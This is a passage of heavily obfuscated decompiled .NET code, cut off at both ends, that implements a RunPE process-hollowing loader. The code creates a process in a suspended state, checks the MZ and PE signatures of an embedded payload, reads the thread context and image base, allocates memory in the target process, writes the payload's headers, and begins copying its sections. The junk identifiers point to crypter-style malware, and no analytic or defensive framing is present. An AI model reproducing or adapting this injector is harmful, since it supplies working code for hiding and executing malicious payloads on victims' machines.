KFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmmm hkujkrwesffdssfoueowdUmmmmmm3 = obj != null ? (rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmmm) obj : hkujkrwesffdssfoueowdUmmmmmm2;
|
|
||||||
NewLateBinding.LateCall(Instance1, (System.Type) null, "Free", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true);
|
|
||||||
IntPtr system;
|
|
||||||
if (-(hkujkrwesffdssfoueowdUsadf((string) null, JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUvzr, ref process1, ref thread, false, 4U, system, (string) null, ref startup, out info) ? 1 : 0) == 0)
|
|
||||||
return;
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzad hkujkrwesffdssfoueowdUzad1 = new rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzad();
|
|
||||||
object structure1 = Marshal.PtrToStructure(new IntPtr(checked (integer + hkujkrwesffdssfoueowdUmmmmmm3.Address)), hkujkrwesffdssfoueowdUzad1.GetType());
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzad hkujkrwesffdssfoueowdUzad2;
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzad hkujkrwesffdssfoueowdUzad3 = structure1 != null ? (rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUzad) structure1 : hkujkrwesffdssfoueowdUzad2;
|
|
||||||
startup.CB = Strings.Len((object) startup);
|
|
||||||
context.Flags = 65539U;
|
|
||||||
if (hkujkrwesffdssfoueowdUzad3.Signature != 17744U | hkujkrwesffdssfoueowdUmmmmmm3.Magic != (ushort) 23117)
|
|
||||||
return;
|
|
||||||
int num1 = hkujkrwesffdssfoueowdU9(info.Thread, ref context) ? 1 : 0;
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUga hkujkrwesffdssfoueowdUga2 = hkujkrwesffdssfoueowdUga1;
|
|
||||||
IntPtr process2 = info.Process;
|
|
||||||
IntPtr address1 = (IntPtr) checked ((long) context.Ebx + 8L);
|
|
||||||
long num2;
|
|
||||||
IntPtr ptr = (IntPtr) num2;
|
|
||||||
ref IntPtr local1 = ref ptr;
|
|
||||||
IntPtr size1 = (IntPtr) 4;
|
|
||||||
int num3 = 0;
|
|
||||||
ref int local2 = ref num3;
|
|
||||||
int num4 = hkujkrwesffdssfoueowdUga2(process2, address1, ref local1, size1, ref local2);
|
|
||||||
long address2 = (long) ptr;
|
|
||||||
long num5 = hkujkrwesffdssfoueowdU2(info.Process, (IntPtr) address2);
|
|
||||||
uint num6 = checked ((uint) (int) hkujkrwesffdssfoueowdU3(info.Process, (IntPtr) (long) hkujkrwesffdssfoueowdUzad3.Optional.Image, hkujkrwesffdssfoueowdUzad3.Optional.SImage, 12288U, 4U));
|
|
||||||
if (num6 == 0U)
|
|
||||||
return;
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUha hkujkrwesffdssfoueowdUha2 = hkujkrwesffdssfoueowdUha1;
|
|
||||||
IntPtr process3 = info.Process;
|
|
||||||
IntPtr address3 = (IntPtr) (long) num6;
|
|
||||||
byte[] buffer1 = JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUvz;
|
|
||||||
IntPtr sheaders = (IntPtr) (long) hkujkrwesffdssfoueowdUzad3.Optional.SHeaders;
|
|
||||||
uint num7;
|
|
||||||
int num8 = checked ((int) num7);
|
|
||||||
ref int local3 = ref num8;
|
|
||||||
int num9 = hkujkrwesffdssfoueowdUha2(process3, address3, buffer1, sheaders, out local3) ? 1 : 0;
|
|
||||||
uint num10 = checked ((uint) num8);
|
|
||||||
long num11 = (long) checked (hkujkrwesffdssfoueowdUmmmmmm3.Address + 248);
|
|
||||||
int num12 = checked ((int) hkujkrwesffdssfoueowdUzad3.File.Sections - 1);
|
|
||||||
int num13 = 0;
|
|
||||||
while (num13 <= num12)
|
|
||||||
{
|
|
||||||
ptr = new IntPtr(checked ((long) integer + num11 + (long) (num13 * 40)));
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmm hkujkrwesffdssfoueowdUmm1;
|
|
||||||
object structure2 = Marshal.PtrToStructure(ptr, hkujkrwesffdssfoueowdUmm1.GetType());
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmm hkujkrwesffdssfoueowdUmm2;
|
|
||||||
hkujkrwesffdssfoueowdUmm1 = structure2 != null ? (rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmm) structure2 : hkujkrwesffdssfoueowdUmm2;
|
|
||||||
byte[] numArray = new byte[checked ((int) hkujkrwesffdssfoueowdUmm1.Size + 1)];
|
|
||||||
int num14 = checked ((int) ((long) hkujkrwesffdssfoueowdUmm1.Size - 1L));
|
|
||||||
int index = 0;
|
|
||||||
while (index <= num14)
|
|
||||||
{
|
|
||||||
